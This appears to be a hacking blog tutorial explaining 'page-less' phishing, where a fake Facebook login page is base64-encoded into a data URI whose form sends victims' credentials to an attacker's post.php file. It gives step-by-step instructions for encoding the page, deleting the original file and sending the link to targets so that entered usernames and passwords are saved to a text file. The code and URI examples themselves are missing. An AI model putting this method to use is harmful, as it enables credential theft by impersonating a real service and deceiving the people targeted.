Base64 encoding is nothing else but the conversion of binary values into ASCII representations.
This allows a launching of phishing attacks without the need to host index.html file anywhere on the server. Hack with Base64 encoding is the new and most famous way to get someone’s credentials easily.
Hence being called as page less phishing attack.
Now to find how a client could be phished without a page?
First of all recall the Facebook phishing attack where index.html page was hosted on the server. The client sent a request to the server after putting their username and password in the respective input fields. The server looked into the action attribute of the index.html page which was assigned as post.php, like given below and redirects the request to post.php file.
Since Base64 encoding is a page less phishing attack which means that the index.html page is not hosted on the internet, so when the index.html page is accessed on the client side it remains unaware of the location of post.php.
So how can a client access a page that does not exist?
To overcome this the action attribute in the index.html is made to point to the full path of the post.php file hosted on the server and is embedded in the URI.
Now the point arises how to embed the page in URI?
Before this lets learn what is URI? Well URI stands for uniform resource identifier which is used to access stuff on web browsers.
The general syntax of URI is:
Here the encoded data is index.html and the mime type is text/html and the encoding type is base64.
Encoding the data:
This can be done in simple steps to hack with Base64 encoding.
Open the index.html file with any text editor for example Notepad++ and copy all the content.
Once the content is copied, open base64encode.org in your browser and see the panel. It will look like this.
Paste the copied content of index.html and press encode, like below represented. This is the base64 encoded data used in URI.
When you press enter you see the encoded data in the below panel.
Delete the index.html file. You don’t need this file because the file is already encoded in base64 algorithm.
Open a new tab in browser and write the following command.
The encoded data is the following you copied from the base64encode.org site. So paste the data in above link in place of encoded data.
This now opens the phishing page for example of Facebook phishing page. Now when a client enters his or her username and password you will get their credentials in the text file you described in post.php file.
All this is you have to give the link of step 4 and of they enter their credentials you would be hacked. In this way you have phished the user.
For any query just have a look on Facebook phishing.
Your comments will be highly appreciated.